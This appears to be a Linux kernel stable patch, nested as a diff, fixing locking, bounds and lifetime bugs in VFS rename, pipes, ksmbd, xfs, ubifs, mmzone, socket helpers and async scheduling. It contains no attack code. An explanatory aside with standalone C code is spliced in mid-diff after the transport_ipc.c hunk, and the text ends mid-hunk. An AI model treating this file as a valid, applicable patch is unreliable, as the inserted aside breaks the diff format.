+@@ -4880,8 +4893,9 @@ int vfs_rename(struct renamedata *rd)
+ 			d_exchange(old_dentry, new_dentry);
+ 	}
+ out:
+-	inode_unlock(source);
+-	if (target)
++	if (!is_dir || lock_old_subdir)
++		inode_unlock(source);
++	if (target && (!new_is_dir || lock_new_subdir))
+ 		inode_unlock(target);
+ 	dput(new_dentry);
+ 	if (!error) {
+diff --git a/fs/pipe.c b/fs/pipe.c
+index 42c7ff41c2dba..9873a6030df56 100644
+--- a/fs/pipe.c
++++ b/fs/pipe.c
+@@ -436,12 +436,10 @@ pipe_write(struct kiocb *iocb, struct iov_iter *from)
+ 		goto out;
+ 	}
+ 
+-#ifdef CONFIG_WATCH_QUEUE
+-	if (pipe->watch_queue) {
++	if (pipe_has_watch_queue(pipe)) {
+ 		ret = -EXDEV;
+ 		goto out;
+ 	}
+-#endif
+ 
+ 	/*
+ 	 * If it wasn't empty we try to merge new data into
+@@ -1303,6 +1301,11 @@ int pipe_resize_ring(struct pipe_inode_info *pipe, unsigned int nr_slots)
+ 	pipe->tail = tail;
+ 	pipe->head = head;
+ 
++	if (!pipe_has_watch_queue(pipe)) {
++		pipe->max_usage = nr_slots;
++		pipe->nr_accounted = nr_slots;
++	}
++
+ 	spin_unlock_irq(&pipe->rd_wait.lock);
+ 
+ 	/* This might have made more room for writers */
+@@ -1320,10 +1323,8 @@ static long pipe_set_size(struct pipe_inode_info *pipe, unsigned long arg)
+ 	unsigned int nr_slots, size;
+ 	long ret = 0;
+ 
+-#ifdef CONFIG_WATCH_QUEUE
+-	if (pipe->watch_queue)
++	if (pipe_has_watch_queue(pipe))
+ 		return -EBUSY;
+-#endif
+ 
+ 	size = round_pipe_size(arg);
+ 	nr_slots = size >> PAGE_SHIFT;
+@@ -1356,8 +1357,6 @@ static long pipe_set_size(struct pipe_inode_info *pipe, unsigned long arg)
+ 	if (ret < 0)
+ 		goto out_revert_acct;
+ 
+-	pipe->max_usage = nr_slots;
+-	pipe->nr_accounted = nr_slots;
+ 	return pipe->max_usage * PAGE_SIZE;
+ 
+ out_revert_acct:
+@@ -1375,10 +1374,8 @@ struct pipe_inode_info *get_pipe_info(struct file *file, bool for_splice)
+ 
+ 	if (file->f_op != &pipefifo_fops || !pipe)
+ 		return NULL;
+-#ifdef CONFIG_WATCH_QUEUE
+-	if (for_splice && pipe->watch_queue)
++	if (for_splice && pipe_has_watch_queue(pipe))
+ 		return NULL;
+-#endif
+ 	return pipe;
+ }
+ 
+diff --git a/fs/smb/server/connection.c b/fs/smb/server/connection.c
+index 7977827c65410..09e1e7771592f 100644
+--- a/fs/smb/server/connection.c
++++ b/fs/smb/server/connection.c
+@@ -284,6 +284,7 @@ int ksmbd_conn_handler_loop(void *p)
+ 		goto out;
+ 
+ 	conn->last_active = jiffies;
++	set_freezable();
+ 	while (ksmbd_conn_alive(conn)) {
+ 		if (try_to_freeze())
+ 			continue;
+diff --git a/fs/smb/server/ksmbd_netlink.h b/fs/smb/server/ksmbd_netlink.h
+index b7521e41402e0..0ebf91ffa2361 100644
+--- a/fs/smb/server/ksmbd_netlink.h
++++ b/fs/smb/server/ksmbd_netlink.h
+@@ -304,7 +304,8 @@ enum ksmbd_event {
+ 	KSMBD_EVENT_SPNEGO_AUTHEN_REQUEST,
+ 	KSMBD_EVENT_SPNEGO_AUTHEN_RESPONSE	= 15,
+ 
+-	KSMBD_EVENT_MAX
++	__KSMBD_EVENT_MAX,
++	KSMBD_EVENT_MAX = __KSMBD_EVENT_MAX - 1
+ };
+ 
+ /*
+diff --git a/fs/smb/server/oplock.c b/fs/smb/server/oplock.c
+index f1831e26adad9..1253e9bde34c8 100644
+--- a/fs/smb/server/oplock.c
++++ b/fs/smb/server/oplock.c
+@@ -105,7 +105,7 @@ static int alloc_lease(struct oplock_info *opinfo, struct lease_ctx_info *lctx)
+ 	lease->is_dir = lctx->is_dir;
+ 	memcpy(lease->parent_lease_key, lctx->parent_lease_key, SMB2_LEASE_KEY_SIZE);
+ 	lease->version = lctx->version;
+-	lease->epoch = le16_to_cpu(lctx->epoch);
++	lease->epoch = le16_to_cpu(lctx->epoch) + 1;
+ 	INIT_LIST_HEAD(&opinfo->lease_entry);
+ 	opinfo->o_lease = lease;
+ 
+@@ -546,6 +546,7 @@ static struct oplock_info *same_client_has_lease(struct ksmbd_inode *ci,
+ 			     atomic_read(&ci->sop_count)) == 1) {
+ 				if (lease->state != SMB2_LEASE_NONE_LE &&
+ 				    lease->state == (lctx->req_state & lease->state)) {
++					lease->epoch++;
+ 					lease->state |= lctx->req_state;
+ 					if (lctx->req_state &
+ 						SMB2_LEASE_WRITE_CACHING_LE)
+@@ -556,13 +557,17 @@ static struct oplock_info *same_client_has_lease(struct ksmbd_inode *ci,
+ 				    atomic_read(&ci->sop_count)) > 1) {
+ 				if (lctx->req_state ==
+ 				    (SMB2_LEASE_READ_CACHING_LE |
+-				     SMB2_LEASE_HANDLE_CACHING_LE))
++				     SMB2_LEASE_HANDLE_CACHING_LE)) {
++					lease->epoch++;
+ 					lease->state = lctx->req_state;
++				}
+ 			}
+ 
+ 			if (lctx->req_state && lease->state ==
+-			    SMB2_LEASE_NONE_LE)
++			    SMB2_LEASE_NONE_LE) {
++				lease->epoch++;
+ 				lease_none_upgrade(opinfo, lctx->req_state);
++			}
+ 		}
+ 		read_lock(&ci->m_lock);
+ 	}
+@@ -1035,7 +1040,8 @@ static void copy_lease(struct oplock_info *op1, struct oplock_info *op2)
+ 	       SMB2_LEASE_KEY_SIZE);
+ 	lease2->duration = lease1->duration;
+ 	lease2->flags = lease1->flags;
+-	lease2->epoch = lease1->epoch++;
++	lease2->epoch = lease1->epoch;
++	lease2->version = lease1->version;
+ }
+ 
+ static int add_lease_global_list(struct oplock_info *opinfo)
+@@ -1453,7 +1459,7 @@ void create_lease_buf(u8 *rbuf, struct lease *lease)
+ 		memcpy(buf->lcontext.LeaseKey, lease->lease_key,
+ 		       SMB2_LEASE_KEY_SIZE);
+ 		buf->lcontext.LeaseFlags = lease->flags;
+-		buf->lcontext.Epoch = cpu_to_le16(++lease->epoch);
++		buf->lcontext.Epoch = cpu_to_le16(lease->epoch);
+ 		buf->lcontext.LeaseState = lease->state;
+ 		memcpy(buf->lcontext.ParentLeaseKey, lease->parent_lease_key,
+ 		       SMB2_LEASE_KEY_SIZE);
+diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c
+index 6826b562073e0..4cfa45c2727ea 100644
+--- a/fs/smb/server/smb2pdu.c
++++ b/fs/smb/server/smb2pdu.c
+@@ -2321,11 +2321,12 @@ out:
+  * @eabuf:	set info command buffer
+  * @buf_len:	set info command buffer length
+  * @path:	dentry path for get ea
++ * @get_write:	get write access to a mount
+  *
+  * Return:	0 on success, otherwise error
+  */
+ static int smb2_set_ea(struct smb2_ea_info *eabuf, unsigned int buf_len,
+-		       const struct path *path)
++		       const struct path *path, bool get_write)
+ {
+ 	struct user_namespace *user_ns = mnt_user_ns(path->mnt);
+ 	char *attr_name = NULL, *value;
+@@ -3013,7 +3014,7 @@ int smb2_open(struct ksmbd_work *work)
+ 
+ 			rc = smb2_set_ea(&ea_buf->ea,
+ 					 le32_to_cpu(ea_buf->ccontext.DataLength),
+-					 &path);
++					 &path, false);
+ 			if (rc == -EOPNOTSUPP)
+ 				rc = 0;
+ 			else if (rc)
+@@ -5578,6 +5579,7 @@ static int smb2_rename(struct ksmbd_work *work,
+ 	if (!file_info->ReplaceIfExists)
+ 		flags = RENAME_NOREPLACE;
+ 
++	smb_break_all_levII_oplock(work, fp, 0);
+ 	rc = ksmbd_vfs_rename(work, &fp->filp->f_path, new_name, flags);
+ out:
+ 	kfree(new_name);
+@@ -5990,7 +5992,7 @@ static int smb2_set_info_file(struct ksmbd_work *work, struct ksmbd_file *fp,
+ 			return -EINVAL;
+ 
+ 		return smb2_set_ea((struct smb2_ea_info *)req->Buffer,
+-				   buf_len, &fp->filp->f_path);
++				   buf_len, &fp->filp->f_path, true);
+ 	}
+ 	case FILE_POSITION_INFORMATION:
+ 	{
+diff --git a/fs/smb/server/transport_ipc.c b/fs/smb/server/transport_ipc.c
+index b49d47bdafc94..f29bb03f0dc47 100644
+--- a/fs/smb/server/transport_ipc.c
++++ b/fs/smb/server/transport_ipc.c
+@@ -74,7 +74,7 @@ static int handle_unsupported_event(struct sk_buff *skb, struct genl_info *info)
+ static int handle_generic_event(struct sk_buff *skb, struct genl_info *info);
+ static int ksmbd_ipc_heartbeat_request(void);
+ 
+-static const struct nla_policy ksmbd_nl_policy[KSMBD_EVENT_MAX] = {
++static const struct nla_policy ksmbd_nl_policy[KSMBD_EVENT_MAX + 1] = {
+ 	[KSMBD_EVENT_UNSPEC] = {
+ 		.len = 0,
+ 	},
+@@ -403,7 +403,7 @@ static int handle_generic_event(struct sk_buff *skb, struct genl_info *info)
+ 		return -EPERM;
+ #endif
+ 
+-	if (type >= KSMBD_EVENT_MAX) {
++	if (type > KSMBD_EVENT_MAX) {
+ 		WARN_ON(1);
+ 		return -EINVAL;
+ 	}
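[The ksmbd_netlink.h/transport_ipc.c pair above adopts the standard netlink enum convention: a __..._MAX sentinel counts the entries, ..._MAX names the last valid value, the policy array is sized MAX + 1 so the last event has a slot, and validation rejects type > MAX. The convention shown standalone, with illustrative names.]

#include <errno.h>

enum demo_event {
	DEMO_EVENT_UNSPEC,
	DEMO_EVENT_A,
	DEMO_EVENT_B,

	__DEMO_EVENT_MAX,
	DEMO_EVENT_MAX = __DEMO_EVENT_MAX - 1
};

/* One policy slot per valid event, including index DEMO_EVENT_MAX. */
static const int demo_policy[DEMO_EVENT_MAX + 1] = { 0 };

static int validate_type(unsigned int type)
{
	if (type > DEMO_EVENT_MAX)   /* '>=' here would reject the last event */
		return -EINVAL;
	return demo_policy[type];    /* in bounds by construction */
}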
+diff --git a/fs/ubifs/dir.c b/fs/ubifs/dir.c
+index 66ba57a139d2a..4d9782e2fab1a 100644
+--- a/fs/ubifs/dir.c
++++ b/fs/ubifs/dir.c
+@@ -1226,6 +1226,8 @@ out_cancel:
+ 	dir_ui->ui_size = dir->i_size;
+ 	mutex_unlock(&dir_ui->ui_mutex);
+ out_inode:
++	/* Free inode->i_link before inode is marked as bad. */
++	fscrypt_free_inode(inode);
+ 	make_bad_inode(inode);
+ 	iput(inode);
+ out_fname:
+diff --git a/fs/xfs/xfs_super.c b/fs/xfs/xfs_super.c
+index 4b179526913f4..12662b169b716 100644
+--- a/fs/xfs/xfs_super.c
++++ b/fs/xfs/xfs_super.c
+@@ -1458,6 +1458,18 @@ xfs_fs_fill_super(
+ 
+ 	mp->m_super = sb;
+ 
++	/*
++	 * Copy VFS mount flags from the context now that all parameter parsing
++	 * is guaranteed to have been completed by either the old mount API or
++	 * the newer fsopen/fsconfig API.
++	 */
++	if (fc->sb_flags & SB_RDONLY)
++		set_bit(XFS_OPSTATE_READONLY, &mp->m_opstate);
++	if (fc->sb_flags & SB_DIRSYNC)
++		mp->m_features |= XFS_FEAT_DIRSYNC;
++	if (fc->sb_flags & SB_SYNCHRONOUS)
++		mp->m_features |= XFS_FEAT_WSYNC;
++
+ 	error = xfs_fs_validate_params(mp);
+ 	if (error)
+ 		goto out_free_names;
+@@ -1915,6 +1927,11 @@ static const struct fs_context_operations xfs_context_ops = {
+ 	.free        = xfs_fs_free,
+ };
+ 
++/*
++ * WARNING: do not initialise any parameters in this function that depend on
++ * mount option parsing having already been performed, as this can be called from
++ * fsopen() before any parameters have been set.
++ */
+ static int xfs_init_fs_context(
+ 	struct fs_context	*fc)
+ {
+@@ -1947,16 +1964,6 @@ static int xfs_init_fs_context(
+ 	mp->m_logbsize = -1;
+ 	mp->m_allocsize_log = 16; /* 64k */
+ 
+-	/*
+-	 * Copy binary VFS mount flags we are interested in.
+-	 */
+-	if (fc->sb_flags & SB_RDONLY)
+-		set_bit(XFS_OPSTATE_READONLY, &mp->m_opstate);
+-	if (fc->sb_flags & SB_DIRSYNC)
+-		mp->m_features |= XFS_FEAT_DIRSYNC;
+-	if (fc->sb_flags & SB_SYNCHRONOUS)
+-		mp->m_features |= XFS_FEAT_WSYNC;
+-
+ 	fc->s_fs_info = mp;
+ 	fc->ops = &xfs_context_ops;
+ 
+diff --git a/include/linux/async.h b/include/linux/async.h
+index cce4ad31e8fcf..33c9ff4afb492 100644
+--- a/include/linux/async.h
++++ b/include/linux/async.h
+@@ -90,6 +90,8 @@ async_schedule_dev(async_func_t func, struct device *dev)
+ 	return async_schedule_node(func, dev, dev_to_node(dev));
+ }
+ 
++bool async_schedule_dev_nocall(async_func_t func, struct device *dev);
++
+ /**
+  * async_schedule_dev_domain - A device specific version of async_schedule_domain
+  * @func: function to execute asynchronously
+diff --git a/include/linux/lsm_hook_defs.h b/include/linux/lsm_hook_defs.h
+index 02b19c508b78f..6239a378c0ea8 100644
+--- a/include/linux/lsm_hook_defs.h
++++ b/include/linux/lsm_hook_defs.h
+@@ -165,6 +165,8 @@ LSM_HOOK(int, 0, file_alloc_security, struct file *file)
+ LSM_HOOK(void, LSM_RET_VOID, file_free_security, struct file *file)
+ LSM_HOOK(int, 0, file_ioctl, struct file *file, unsigned int cmd,
+ 	 unsigned long arg)
++LSM_HOOK(int, 0, file_ioctl_compat, struct file *file, unsigned int cmd,
++	 unsigned long arg)
+ LSM_HOOK(int, 0, mmap_addr, unsigned long addr)
+ LSM_HOOK(int, 0, mmap_file, struct file *file, unsigned long reqprot,
+ 	 unsigned long prot, unsigned long flags)
+diff --git a/include/linux/mc146818rtc.h b/include/linux/mc146818rtc.h
+index b0da04fe087bb..34dfcc77f505a 100644
+--- a/include/linux/mc146818rtc.h
++++ b/include/linux/mc146818rtc.h
+@@ -126,10 +126,11 @@ struct cmos_rtc_board_info {
+ #endif /* ARCH_RTC_LOCATION */
+ 
+ bool mc146818_does_rtc_work(void);
+-int mc146818_get_time(struct rtc_time *time);
++int mc146818_get_time(struct rtc_time *time, int timeout);
+ int mc146818_set_time(struct rtc_time *time);
+ 
+ bool mc146818_avoid_UIP(void (*callback)(unsigned char seconds, void *param),
++			int timeout,
+ 			void *param);
+ 
+ #endif /* _MC146818RTC_H */
+diff --git a/include/linux/mmzone.h b/include/linux/mmzone.h
+index 323ee36df683e..638d2124d1cb9 100644
+--- a/include/linux/mmzone.h
++++ b/include/linux/mmzone.h
+@@ -1622,6 +1622,7 @@ static inline unsigned long section_nr_to_pfn(unsigned long sec)
+ #define SUBSECTION_ALIGN_DOWN(pfn) ((pfn) & PAGE_SUBSECTION_MASK)
+ 
+ struct mem_section_usage {
++	struct rcu_head rcu;
+ #ifdef CONFIG_SPARSEMEM_VMEMMAP
+ 	DECLARE_BITMAP(subsection_map, SUBSECTIONS_PER_SECTION);
+ #endif
+@@ -1815,7 +1816,7 @@ static inline int pfn_section_valid(struct mem_section *ms, unsigned long pfn)
+ {
+ 	int idx = subsection_map_index(pfn);
+ 
+-	return test_bit(idx, ms->usage->subsection_map);
++	return test_bit(idx, READ_ONCE(ms->usage)->subsection_map);
+ }
+ #else
+ static inline int pfn_section_valid(struct mem_section *ms, unsigned long pfn)
+@@ -1839,6 +1840,7 @@ static inline int pfn_section_valid(struct mem_section *ms, unsigned long pfn)
+ static inline int pfn_valid(unsigned long pfn)
+ {
+ 	struct mem_section *ms;
++	int ret;
+ 
+ 	/*
+ 	 * Ensure the upper PAGE_SHIFT bits are clear in the
+@@ -1852,13 +1854,19 @@ static inline int pfn_valid(unsigned long pfn)
+ 	if (pfn_to_section_nr(pfn) >= NR_MEM_SECTIONS)
+ 		return 0;
+ 	ms = __pfn_to_section(pfn);
+-	if (!valid_section(ms))
++	rcu_read_lock();
++	if (!valid_section(ms)) {
++		rcu_read_unlock();
+ 		return 0;
++	}
+ 	/*
+ 	 * Traditionally early sections always returned pfn_valid() for
+ 	 * the entire section-sized span.
+ 	 */
+-	return early_section(ms) || pfn_section_valid(ms, pfn);
++	ret = early_section(ms) || pfn_section_valid(ms, pfn);
++	rcu_read_unlock();
++
++	return ret;
+ }
+ #endif
+ 
+diff --git a/include/linux/pipe_fs_i.h b/include/linux/pipe_fs_i.h
+index 28b3c6a673975..1f1e7ae953205 100644
+--- a/include/linux/pipe_fs_i.h
++++ b/include/linux/pipe_fs_i.h
+@@ -124,6 +124,22 @@ struct pipe_buf_operations {
+ 	bool (*get)(struct pipe_inode_info *, struct pipe_buffer *);
+ };
+ 
++/**
++ * pipe_has_watch_queue - Check whether the pipe is a watch_queue,
++ * i.e. it was created with O_NOTIFICATION_PIPE
++ * @pipe: The pipe to check
++ *
++ * Return: true if pipe is a watch queue, false otherwise.
++ */
++static inline bool pipe_has_watch_queue(const struct pipe_inode_info *pipe)
++{
++#ifdef CONFIG_WATCH_QUEUE
++	return pipe->watch_queue != NULL;
++#else
++	return false;
++#endif
++}
++
+ /**
+  * pipe_empty - Return true if the pipe is empty
+  * @head: The pipe ring head pointer
+diff --git a/include/linux/rmap.h b/include/linux/rmap.h
+index 2bdba700bc3e3..7d1ecd9b43733 100644
+--- a/include/linux/rmap.h
++++ b/include/linux/rmap.h
+@@ -250,8 +250,8 @@ static inline int page_try_dup_anon_rmap(struct page *page, bool compound,
+ 	 * guarantee the pinned page won't be randomly replaced in the
+ 	 * future on write faults.
+ 	 */
+-	if (likely(!is_device_private_page(page) &&
+-	    unlikely(page_needs_cow_for_dma(vma, page))))
++	if (likely(!is_device_private_page(page)) &&
++	    unlikely(page_needs_cow_for_dma(vma, page)))
+ 		return -EBUSY;
+ 
+ 	ClearPageAnonExclusive(page);
+diff --git a/include/linux/security.h b/include/linux/security.h
+index a6c97cc57caa0..2772f6375f140 100644
+--- a/include/linux/security.h
++++ b/include/linux/security.h
+@@ -385,6 +385,8 @@ int security_file_permission(struct file *file, int mask);
+ int security_file_alloc(struct file *file);
+ void security_file_free(struct file *file);
+ int security_file_ioctl(struct file *file, unsigned int cmd, unsigned long arg);
++int security_file_ioctl_compat(struct file *file, unsigned int cmd,
++			       unsigned long arg);
+ int security_mmap_file(struct file *file, unsigned long prot,
+ 			unsigned long flags);
+ int security_mmap_addr(unsigned long addr);
+@@ -969,6 +971,13 @@ static inline int security_file_ioctl(struct file *file, unsigned int cmd,
+ 	return 0;
+ }
+ 
++static inline int security_file_ioctl_compat(struct file *file,
++					     unsigned int cmd,
++					     unsigned long arg)
++{
++	return 0;
++}
++
+ static inline int security_mmap_file(struct file *file, unsigned long prot,
+ 				     unsigned long flags)
+ {
+diff --git a/include/linux/serial_core.h b/include/linux/serial_core.h
+index d657f2a42a7b8..13bf20242b61a 100644
+--- a/include/linux/serial_core.h
++++ b/include/linux/serial_core.h
+@@ -583,6 +583,85 @@ struct uart_port {
+ 	void			*private_data;		/* generic platform data pointer */
+ };
+ 
++/**
++ * uart_port_lock - Lock the UART port
++ * @up:		Pointer to UART port structure
++ */
++static inline void uart_port_lock(struct uart_port *up)
++{
++	spin_lock(&up->lock);
++}
++
++/**
++ * uart_port_lock_irq - Lock the UART port and disable interrupts
++ * @up:		Pointer to UART port structure
++ */
++static inline void uart_port_lock_irq(struct uart_port *up)
++{
++	spin_lock_irq(&up->lock);
++}
++
++/**
++ * uart_port_lock_irqsave - Lock the UART port, save and disable interrupts
++ * @up:		Pointer to UART port structure
++ * @flags:	Pointer to interrupt flags storage
++ */
++static inline void uart_port_lock_irqsave(struct uart_port *up, unsigned long *flags)
++{
++	spin_lock_irqsave(&up->lock, *flags);
++}
++
++/**
++ * uart_port_trylock - Try to lock the UART port
++ * @up:		Pointer to UART port structure
++ *
++ * Returns: True if lock was acquired, false otherwise
++ */
++static inline bool uart_port_trylock(struct uart_port *up)
++{
++	return spin_trylock(&up->lock);
++}
++
++/**
++ * uart_port_trylock_irqsave - Try to lock the UART port, save and disable interrupts
++ * @up:		Pointer to UART port structure
++ * @flags:	Pointer to interrupt flags storage
++ *
++ * Returns: True if lock was acquired, false otherwise
++ */
++static inline bool uart_port_trylock_irqsave(struct uart_port *up, unsigned long *flags)
++{
++	return spin_trylock_irqsave(&up->lock, *flags);
++}
++
++/**
++ * uart_port_unlock - Unlock the UART port
++ * @up:		Pointer to UART port structure
++ */
++static inline void uart_port_unlock(struct uart_port *up)
++{
++	spin_unlock(&up->lock);
++}
++
++/**
++ * uart_port_unlock_irq - Unlock the UART port and re-enable interrupts
++ * @up:		Pointer to UART port structure
++ */
++static inline void uart_port_unlock_irq(struct uart_port *up)
++{
++	spin_unlock_irq(&up->lock);
++}
++
++/**
++ * uart_port_unlock_irqrestore - Unlock the UART port, restore interrupts
++ * @up:		Pointer to UART port structure
++ * @flags:	The saved interrupt flags for restore
++ */
++static inline void uart_port_unlock_irqrestore(struct uart_port *up, unsigned long flags)
++{
++	spin_unlock_irqrestore(&up->lock, flags);
++}
++
+ static inline int serial_port_in(struct uart_port *up, int offset)
+ {
+ 	return up->serial_in(up, offset);
+diff --git a/include/linux/skmsg.h b/include/linux/skmsg.h
+index c953b8c0d2f43..bd4418377bacf 100644
+--- a/include/linux/skmsg.h
++++ b/include/linux/skmsg.h
+@@ -500,12 +500,6 @@ static inline bool sk_psock_strp_enabled(struct sk_psock *psock)
+ 	return !!psock->saved_data_ready;
+ }
+ 
+-static inline bool sk_is_udp(const struct sock *sk)
+-{
+-	return sk->sk_type == SOCK_DGRAM &&
+-	       sk->sk_protocol == IPPROTO_UDP;
+-}
+-
+ #if IS_ENABLED(CONFIG_NET_SOCK_MSG)
+ 
+ #define BPF_F_STRPARSER	(1UL << 1)
+diff --git a/include/linux/syscalls.h b/include/linux/syscalls.h
+index a34b0f9a9972e..27a6ba1c0ec4e 100644
+--- a/include/linux/syscalls.h
++++ b/include/linux/syscalls.h
+@@ -123,6 +123,7 @@ enum landlock_rule_type;
+ #define __TYPE_IS_LL(t) (__TYPE_AS(t, 0LL) || __TYPE_AS(t, 0ULL))
+ #define __SC_LONG(t, a) __typeof(__builtin_choose_expr(__TYPE_IS_LL(t), 0LL, 0L)) a
+ #define __SC_CAST(t, a)	(__force t) a
++#define __SC_TYPE(t, a)	t
+ #define __SC_ARGS(t, a)	a
+ #define __SC_TEST(t, a) (void)BUILD_BUG_ON_ZERO(!__TYPE_IS_LL(t) && sizeof(t) > sizeof(long))
+ 
+diff --git a/include/net/inet_connection_sock.h b/include/net/inet_connection_sock.h
+index c2b15f7e55161..080968d6e6c53 100644
+--- a/include/net/inet_connection_sock.h
++++ b/include/net/inet_connection_sock.h
+@@ -346,4 +346,12 @@ static inline bool inet_csk_has_ulp(struct sock *sk)
+ 	return inet_sk(sk)->is_icsk && !!inet_csk(sk)->icsk_ulp_ops;
+ }
+ 
++static inline void inet_init_csk_locks(struct sock *sk)
++{
++	struct inet_connection_sock *icsk = inet_csk(sk);
++
++	spin_lock_init(&icsk->icsk_accept_queue.rskq_lock);
++	spin_lock_init(&icsk->icsk_accept_queue.fastopenq.lock);
++}
++
+ #endif /* _INET_CONNECTION_SOCK_H */
+diff --git a/include/net/inet_sock.h b/include/net/inet_sock.h
+index c2432c2addc82..c98890e21401c 100644
+--- a/include/net/inet_sock.h
++++ b/include/net/inet_sock.h
+@@ -270,11 +270,6 @@ struct inet_sock {
+ #define IP_CMSG_CHECKSUM	BIT(7)
+ #define IP_CMSG_RECVFRAGSIZE	BIT(8)
+ 
+-static inline bool sk_is_inet(struct sock *sk)
+-{
+-	return sk->sk_family == AF_INET || sk->sk_family == AF_INET6;
+-}
+-
+ /**
+  * sk_to_full_sk - Access to a full socket
+  * @sk: pointer to a socket
+diff --git a/include/net/llc_pdu.h b/include/net/llc_pdu.h
+index 49aa79c7b278a..581cd37aa98b7 100644
+--- a/include/net/llc_pdu.h
++++ b/include/net/llc_pdu.h
+@@ -262,8 +262,7 @@ static inline void llc_pdu_header_init(struct sk_buff *skb, u8 type,
+  */
+ static inline void llc_pdu_decode_sa(struct sk_buff *skb, u8 *sa)
+ {
+-	if (skb->protocol == htons(ETH_P_802_2))
+-		memcpy(sa, eth_hdr(skb)->h_source, ETH_ALEN);
++	memcpy(sa, eth_hdr(skb)->h_source, ETH_ALEN);
+ }
+ 
+ /**
+@@ -275,8 +274,7 @@ static inline void llc_pdu_decode_sa(struct sk_buff *skb, u8 *sa)
+  */
+ static inline void llc_pdu_decode_da(struct sk_buff *skb, u8 *da)
+ {
+-	if (skb->protocol == htons(ETH_P_802_2))
+-		memcpy(da, eth_hdr(skb)->h_dest, ETH_ALEN);
++	memcpy(da, eth_hdr(skb)->h_dest, ETH_ALEN);
+ }
+ 
+ /**
+diff --git a/include/net/sock.h b/include/net/sock.h
+index 6b51e85ae69e3..579732d47dfc4 100644
+--- a/include/net/sock.h
++++ b/include/net/sock.h
+@@ -2824,9 +2824,25 @@ static inline void skb_setup_tx_timestamp(struct sk_buff *skb, __u16 tsflags)
+ 			   &skb_shinfo(skb)->tskey);
+ }
+ 
++static inline bool sk_is_inet(const struct sock *sk)
++{
++	int family = READ_ONCE(sk->sk_family);
++
++	return family == AF_INET || family == AF_INET6;
++}
++
+ static inline bool sk_is_tcp(const struct sock *sk)
+ {
+-	return sk->sk_type == SOCK_STREAM && sk->sk_protocol == IPPROTO_TCP;
++	return sk_is_inet(sk) &&
++	       sk->sk_type == SOCK_STREAM &&
++	       sk->sk_protocol == IPPROTO_TCP;
++}
++
++static inline bool sk_is_udp(const struct sock *sk)
++{
++	return sk_is_inet(sk) &&
++	       sk->sk_type == SOCK_DGRAM &&
++	       sk->sk_protocol == IPPROTO_UDP;
+ }
+ 
+ static inline bool sk_is_stream_unix(const struct sock *sk)
+diff --git a/include/uapi/linux/btrfs.h b/include/uapi/linux/btrfs.h
+index d4d4fa0bb362e..24b54635bae90 100644
+--- a/include/uapi/linux/btrfs.h
++++ b/include/uapi/linux/btrfs.h
+@@ -585,6 +585,9 @@ struct btrfs_ioctl_clone_range_args {
+  */
+ #define BTRFS_DEFRAG_RANGE_COMPRESS 1
+ #define BTRFS_DEFRAG_RANGE_START_IO 2
++#define BTRFS_DEFRAG_RANGE_FLAGS_SUPP	(BTRFS_DEFRAG_RANGE_COMPRESS |		\
++					 BTRFS_DEFRAG_RANGE_START_IO)
++
+ struct btrfs_ioctl_defrag_range_args {
+ 	/* start of the defrag operation */
+ 	__u64 start;
+diff --git a/kernel/async.c b/kernel/async.c
+index b2c4ba5686ee4..673bba6bdf3a0 100644
+--- a/kernel/async.c
++++ b/kernel/async.c
+@@ -145,6 +145,39 @@ static void async_run_entry_fn(struct work_struct *work)
+ 	wake_up(&async_done);
+ }
+ 
++static async_cookie_t __async_schedule_node_domain(async_func_t func,
++						   void *data, int node,
++						   struct async_domain *domain,
++						   struct async_entry *entry)
++{
++	async_cookie_t newcookie;
++	unsigned long flags;
++
++	INIT_LIST_HEAD(&entry->domain_list);
++	INIT_LIST_HEAD(&entry->global_list);
++	INIT_WORK(&entry->work, async_run_entry_fn);
++	entry->func = func;
++	entry->data = data;
++	entry->domain = domain;
++
++	spin_lock_irqsave(&async_lock, flags);
++
++	/* allocate cookie and queue */
++	newcookie = entry->cookie = next_cookie++;
++
++	list_add_tail(&entry->domain_list, &domain->pending);
++	if (domain->registered)
++		list_add_tail(&entry->global_list, &async_global_pending);
++
++	atomic_inc(&entry_count);
++	spin_unlock_irqrestore(&async_lock, flags);
++
++	/* schedule for execution */
++	queue_work_node(node, system_unbound_wq, &entry->work);
++
++	return newcookie;
++}
++
+ /**
+  * async_schedule_node_domain - NUMA specific version of async_schedule_domain
+  * @func: function to execute asynchronously
+@@ -186,29 +219,8 @@ async_cookie_t async_schedule_node_domain(async_func_t func, void *data,
+ 		func(data, newcookie);
+ 		return newcookie;
+ 	}
+-	INIT_LIST_HEAD(&entry->domain_list);
+-	INIT_LIST_HEAD(&entry->global_list);
+-	INIT_WORK(&entry->work, async_run_entry_fn);
+-	entry->func = func;
+-	entry->data = data;
+-	entry->domain = domain;
+-
+-	spin_lock_irqsave(&async_lock, flags);
+-
+-	/* allocate cookie and queue */
+-	newcookie = entry->cookie = next_cookie++;
+-
+-	list_add_tail(&entry->domain_list, &domain->pending);
+-	if (domain->registered)
+-		list_add_tail(&entry->global_list, &async_global_pending);
+-
+-	atomic_inc(&entry_count);
+-	spin_unlock_irqrestore(&async_lock, flags);
+-
+-	/* schedule for execution */
+-	queue_work_node(node, system_unbound_wq, &entry->work);
+ 
+-	return newcookie;
++	return __async_schedule_node_domain(func, data, node, domain, entry);
+ }
+ EXPORT_SYMBOL_GPL(async_schedule_node_domain);
+ 
+@@ -231,6 +243,35 @@ async_cookie_t async_schedule_node(async_func_t func, void *data, int node)
+ }
+ EXPORT_SYMBOL_GPL(async_schedule_node);
+ 
++/**
++ * async_schedule_dev_nocall - A simplified variant of async_schedule_dev()
++ * @func: function to execute asynchronously
++ * @dev: device argument to be passed to function
++ *
++ * @dev is used as both the argument for the function and to provide NUMA
++ * context for where to run the function.
++ *
++ * If the asynchronous execution of @func is scheduled successfully, return
++ * true. Otherwise, do nothing and return false, unlike async_schedule_dev()
++ * that will run the function synchronously then.
++ */
++bool async_schedule_dev_nocall(async_func_t func, struct device *dev)
++{
++	struct async_entry *entry;
++
++	entry = kzalloc(sizeof(struct async_entry), GFP_KERNEL);
++
++	/* Give up if there is no memory or too much work. */
++	if (!entry || atomic_read(&entry_count) > MAX_WORK) {
++		kfree(entry);
++		return false;
++	}
++
++	__async_schedule_node_domain(func, dev, dev_to_node(dev),
++				     &async_dfl_domain, entry);
++	return true;
++}
++
+ /**
+  * async_synchronize_full - synchronize all asynchronous function calls
+  *
+diff --git a/kernel/power/swap.c b/kernel/power/swap.c
+index cc44c37699de6..5ab54ab5ace7c 100644
+--- a/kernel/power/swap.c
++++ b/kernel/power/swap.c
+@@ -605,11 +605,11 @@ static int crc32_threadfn(void *data)
